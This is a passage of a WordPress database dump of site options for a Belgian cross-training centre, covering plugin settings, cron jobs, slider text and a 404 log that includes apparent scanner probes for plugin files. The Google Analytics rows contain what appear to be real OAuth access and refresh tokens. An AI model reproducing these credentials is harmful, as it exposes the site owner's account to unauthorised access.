";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}', 'yes'),
(93, 'widget_search', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(94, 'widget_recent-posts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(179, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(95, 'widget_recent-comments', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(96, 'widget_archives', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_meta', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'sidebars_widgets', 'a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:19:\"primary-widget-area\";a:2:{i:0;s:6:\"text-2\";i:1;s:6:\"text-3\";}s:21:\"secondary-widget-area\";a:0:{}s:24:\"first-footer-widget-area\";a:0:{}s:25:\"second-footer-widget-area\";a:0:{}s:24:\"third-footer-widget-area\";a:0:{}s:25:\"fourth-footer-widget-area\";a:0:{}s:5:\"wop-1\";a:1:{i:0;s:21:\"total_slider_widget-2\";}s:13:\"array_version\";i:3;}', 'yes'),
(99, 'cron', 'a:5:{i:1546797892;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1546797903;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1546798191;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1546798492;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}s:7:\"version\";i:2;}', 'yes'),
(129152, '_site_transient_timeout_theme_roots', '1546765798', 'no'),
(129153, '_site_transient_theme_roots', 'a:4:{s:6:\"figero\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}', 'no'),
(108, 'dashboard_widget_options', 'a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:33:\"http://www.crosstrainingcenter.be\";s:4:\"link\";s:109:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://www.crosstrainingcenter.be/\";s:3:\"url\";s:142:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.crosstrainingcenter.be/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}', 'yes'),
(1454, 'ga_version', '6.4.5', 'yes'),
(1461, 'key_ga_show_ad', '1', 'yes'),
(1492, 'ga_status', 'enabled', 'yes'),
(1493, 'ga_uid', 'UA-43427378-1', 'yes'),
(1494, 'ga_admin_status', 'enabled', 'yes'),
(1495, 'ga_admin_disable', 'remove', 'yes'),
(1496, 'ga_admin_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1497, 'ga_dashboard_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1498, 'ga_adsense', '', 'yes'),
(1499, 'ga_extra', '', 'yes'),
(1500, 'ga_extra_after', '', 'yes'),
(1501, 'ga_event', 'enabled', 'yes'),
(1502, 'ga_outbound', 'enabled', 'yes'),
(1503, 'ga_outbound_prefix', 'outgoing', 'yes'),
(1504, 'ga_downloads', '', 'yes'),
(1505, 'ga_downloads_prefix', 'download', 'yes'),
(1506, 'ga_widgets', 'enabled', 'yes'),
(1507, 'ga_annon', '0', 'yes'),
(1508, 'ga_defaults', 'no', 'yes'),
(1509, 'ga_google_token', '4/dNk5yqbLvToGOr1L7AxlR-X-8Ajt.EujwRiWfyc0aOl05ti8ZT3Yx2ttUgQI', 'yes'),
(1510, 'ga_google_authtoken', '{\"access_token\":\"ya29.AHES6ZRbkgsrQiqi5K4snq6eD62QKMa5qD6wa3jo62-mJRCzxnoZjA\",\"token_type\":\"Bearer\",\"expires_in\":3600,\"refresh_token\":\"1\\/OfCFSCmF7A0ckb7rn1b2TIgqTbSrbglAQ6AYdvuZWUQ\",\"created\":1377248758}', 'yes'),
(1511, 'ga_enable_remarketing', '0', 'yes'),
(1512, 'key_ga_track_login', '0', 'yes'),
(780, 'seo_ultimate_module_more-links', 'a:1:{s:7:\"default\";s:45:\"Continue reading &#8220;{post}&#8221; &raquo;\";}', 'yes'),
(781, 'seo_ultimate_module_opengraph', 'a:6:{s:20:\"default_post_og_type\";s:7:\"article\";s:20:\"default_page_og_type\";s:7:\"article\";s:25:\"default_post_twitter_card\";s:7:\"summary\";s:25:\"default_page_twitter_card\";s:7:\"summary\";s:31:\"default_attachment_twitter_card\";s:5:\"photo\";s:24:\"enable_og_article_author\";b:1;}', 'yes'),
(782, 'seo_ultimate_module_permalinks', 'a:1:{s:20:\"add_rule_if_conflict\";b:1;}', 'yes'),
(783, 'seo_ultimate_module_sharing-buttons', 'a:3:{s:8:\"provider\";s:4:\"none\";s:14:\"sharethis_code\";s:104:\"<script type=\"text/javascript\" charset=\"utf-8\" src=\"http://w.sharethis.com/widget/?wp={wpver}\"></script>\";s:12:\"addthis_code\";s:298:\"<a class=\"addthis_button\" href=\"http://addthis.com/bookmark.php?v=250\"><img src=\"http://s7.addthis.com/static/btn/v2/lg-share-en.gif\" width=\"125\" height=\"16\" alt=\"Bookmark and Share\" style=\"border:0\"/></a><script type=\"text/javascript\" src=\"http://s7.addthis.com/js/250/addthis_widget.js\"></script>\";}', 'yes'),
(216, 'recently_activated', 'a:10:{s:25:\"duplicator/duplicator.php\";i:1500471503;s:37:\"widgets-on-pages/widgets_on_pages.php\";i:1500471486;s:23:\"wordfence/wordfence.php\";i:1500471423;s:29:\"total-slider/total-slider.php\";i:1500471413;s:31:\"slideshow-manager/slideshow.php\";i:1500471408;s:29:\"seo-ultimate/seo-ultimate.php\";i:1500471404;s:19:\"piklist/piklist.php\";i:1500471401;s:43:\"google-analyticator/google-analyticator.php\";i:1500471396;s:35:\"display-widgets/display-widgets.php\";i:1500471356;s:35:\"clicface-trombi/clicface-trombi.php\";i:1500471351;}', 'yes'),
(402, 'total_slider_slides_objectifs', 'a:2:{i:0;a:7:{s:2:\"id\";s:22:\"51bda731e758a799802144\";s:5:\"title\";s:20:\"Coaching personnel :\";s:11:\"description\";s:163:\"Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles. \";s:10:\"background\";s:1:\"0\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}i:1;a:7:{s:2:\"id\";s:22:\"51bda771a2759105225246\";s:5:\"title\";s:27:\"Encadrement professionnel :\";s:11:\"description\";s:152:\"Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine. \";s:10:\"background\";s:2:\"68\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}}', 'yes'),
(407, 'widget_total_slider_widget', 'a:2:{i:2;a:3:{s:9:\"groupSlug\";s:9:\"objectifs\";s:10:\"dw_include\";i:0;s:9:\"other_ids\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(505, 'piklist_active_plugin_versions', 'a:2:{s:19:\"piklist/piklist.php\";a:2:{i:0;s:5:\"0.7.2\";i:1;s:5:\"0.7.2\";}s:35:\"clicface-trombi/clicface-trombi.php\";a:3:{i:0;s:4:\"1.09\";i:1;s:4:\"1.08\";i:2;s:4:\"1.08\";}}', 'yes'),
(506, 'piklist_post_type_rules_flushed', 'a:1:{s:13:\"collaborateur\";b:1;}', 'yes'),
(399, 'total_slider_slide_groups', 'a:1:{i:0;O:17:\"Total_Slide_Group\":5:{s:4:\"slug\";s:9:\"objectifs\";s:12:\"originalSlug\";s:9:\"objectifs\";s:4:\"name\";s:9:\"Objectifs\";s:16:\"templateLocation\";s:7:\"builtin\";s:8:\"template\";s:7:\"default\";}}', 'yes'),
(400, 'total_slider_general_options', 'a:2:{s:23:\"should_enqueue_template\";s:1:\"1\";s:26:\"should_show_tinymce_button\";s:1:\"1\";}', 'yes'),
(401, 'total_slider_dataformat_version', '1.1', 'yes'),
(121527, '_transient_timeout_plugin_slugs', '1500557923', 'no'),
(121528, '_transient_plugin_slugs', 'a:5:{i:0;s:36:\"contact-form-7/wp-contact-form-7.php\";i:1;s:35:\"display-widgets/display-widgets.php\";i:2;s:25:\"easy-table/easy-table.php\";i:3;s:9:\"hello.php\";i:4;s:47:\"really-simple-captcha/really-simple-captcha.php\";}', 'no'),
(35840, 'wordfence_version', '5.3.11', 'yes'),
(35841, 'wordfenceActivated', '0', 'yes'),
(35842, 'wf_plugin_act_error', '', 'yes'),
(771, 'seo_ultimate', 'a:2:{s:7:\"version\";s:5:\"7.6.1\";s:7:\"modules\";a:37:{s:7:\"modules\";i:10;s:7:\"widgets\";i:10;s:4:\"fofs\";i:10;s:8:\"fofs-log\";i:10;s:13:\"fofs-settings\";i:10;s:12:\"import-aiosp\";i:10;s:9:\"canonical\";i:10;s:9:\"user-code\";i:10;s:17:\"content-autolinks\";i:10;s:26:\"content-autolinks-settings\";i:10;s:9:\"autolinks\";i:10;s:5:\"files\";i:10;s:16:\"footer-autolinks\";i:10;s:25:\"footer-autolinks-settings\";i:10;s:15:\"global-settings\";i:10;s:7:\"install\";i:10;s:21:\"internal-link-aliases\";i:10;s:7:\"linkbox\";i:10;s:17:\"meta-descriptions\";i:10;s:11:\"meta-robots\";i:10;s:10:\"more-links\";i:10;s:7:\"noindex\";i:10;s:9:\"opengraph\";i:10;s:10:\"permalinks\";i:10;s:13:\"rich-snippets\";i:10;s:8:\"settings\";i:10;s:13:\"settings-data\";i:10;s:11:\"wp-settings\";i:10;s:15:\"sharing-buttons\";i:10;s:5:\"slugs\";i:10;s:6:\"titles\";i:10;s:9:\"uninstall\";i:10;s:16:\"webmaster-verify\";i:10;s:8:\"sds-blog\";i:10;s:4:\"misc\";i:10;s:13:\"link-nofollow\";i:-10;s:13:\"meta-keywords\";i:-10;}}', 'yes');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(772, 'seo_ultimate_module_404s', 'a:7:{s:10:\"exceptions\";s:66:\"*/favicon.ico\n*/apple-touch-icon.png\n*/pingserver.php\n*/xmlrpc.php\";s:12:\"max_log_size\";i:100;s:11:\"log_enabled\";b:1;s:16:\"restrict_logging\";b:1;s:11:\"log_spiders\";b:1;s:24:\"log_errors_with_referers\";b:1;s:3:\"log\";a:101:{s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207699;}s:84:\"http://www.crosstrainingcenter.be/le-cross-training/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207704;}s:84:\"http://www.crosstrainingcenter.be/notre-philosophie/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207709;}s:78:\"http://www.crosstrainingcenter.be/les-seances/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436497;}s:74:\"http://www.crosstrainingcenter.be/lequipe/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436502;}s:74:\"http://www.crosstrainingcenter.be/contact/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:18;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/contact/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464185;}s:73:\"http://www.crosstrainingcenter.be/this.options[this.selectedIndex].value;\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1376436072;}s:66:\"http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png\";a:5:{s:9:\"hit_count\";i:6;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:21:\"http://www.google.be/\";i:1;s:21:\"http://www.google.fr/\";}s:11:\"user_agents\";a:3:{i:0;s:19:\"Googlebot-Image/1.0\";i:1;s:137:\"Mozilla/5.0 (Linux; Android 4.1.2; GT-S7390 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\";i:2;s:138:\"Mozilla/5.0 (Linux; Android 4.3; D5503 Build/14.2.A.1.114) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\";}s:13:\"last_hit_time\";i:1430714516;}s:35:\"http://www.crosstrainingcenter.be/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207699;}s:53:\"http://www.crosstrainingcenter.be/le-cross-training/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207702;}s:53:\"http://www.crosstrainingcenter.be/notre-philosophie/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207708;}s:47:\"http://www.crosstrainingcenter.be/les-seances/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436495;}s:43:\"http://www.crosstrainingcenter.be/lequipe/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436500;}s:56:\"http://www.crosstrainingcenter.be/pdg/css/960_24_col.css\";a:5:{s:9:\"hit_count\";i:13;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";i:1;s:47:\"http://www.crosstrainingcenter.be/pdg/style.css\";}s:11:\"user_agents\";a:6:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";i:2;s:132:\"Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; GT-P5110 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\";i:3;s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1\";i:4;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\";i:5;s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\";}s:13:\"last_hit_time\";i:1383469258;}s:51:\"http://www.crosstrainingcenter.be/pdg/css/reset.css\";a:5:{s:9:\"hit_count\";i:10;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";}s:11:\"user_agents\";a:4:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";i:2;s:75:\"Opera/9.80 (Macintosh; Intel Mac OS X 10.8.5) Presto/2.12.388 Version/12.16\";i:3;s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\";}s:13:\"last_hit_time\";i:1387874397;}s:101:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:98:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139637;}s:134:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:131:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139640;}s:149:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:146:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139645;}s:146:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:143:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139648;}s:48:\"http://www.crosstrainingcenter.be/comments/feed/\";a:5:{s:9:\"hit_count\";i:144;s:6:\"is_new\";b:1;s:8:\"referers\";a:8:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";i:1;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";i:2;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";i:3;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";i:4;s:44:\"http://www.crosstrainingcenter.be/en-images/\";i:5;s:42:\"http://www.crosstrainingcenter.be/contact/\";i:6;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";i:7;s:33:\"http://www.crosstrainingcenter.be\";}s:11:\"user_agents\";a:21:{i:0;s:179:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\";i:1;s:74:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1\";i:2;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; .NET4.0C; .NET4.0E)\";i:3;s:8:\"PHPCrawl\";i:4;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:5;s:171:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\";i:6;s:245:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";i:7;s:157:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";i:8;s:83:\"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\";i:9;s:196:\"Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:10;s:55:\"berlin-fu-cow/vlcow2014 (+http://hpsg.fu-berlin.de/cow)\";i:11;s:76:\"Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)\";i:12;s:164:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)\";i:13;s:89:\"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\";i:14;s:74:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1\";i:15;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\";i:16;s:157:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)\";i:17;s:83:\"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\";i:18;s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:19;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36\";i:20;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1500407884;}s:40:\"http://www.crosstrainingcenter.be/ok.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:51:\"http://www.crosstrainingcenter.be/reservation1.html\";}s:11:\"user_agents\";a:1:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";}s:13:\"last_hit_time\";i:1387132965;}s:80:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/692428003.png\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:52:\"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)\";}s:13:\"last_hit_time\";i:1392564829;}s:92:\"http://www.crosstrainingcenter.be/wp-content/plugins/xcloner-backup-and-restore/css/main.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/plugins/xcloner-backup-and-restore/css/main.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1393173545;}s:84:\"http://www.crosstrainingcenter.be/wp-content/plugins/tell-a-friend/tell-a-friend.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:83:\"http://crosstrainingbenefits.com/wp-content/plugins/tell-a-friend/tell-a-friend.php\";}s:11:\"user_agents\";a:1:{i:0;s:202:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\";}s:13:\"last_hit_time\";i:1393865111;}s:38:\"http://www.crosstrainingcenter.be/?p=2\";a:5:{s:9:\"hit_count\";i:7;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=2\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 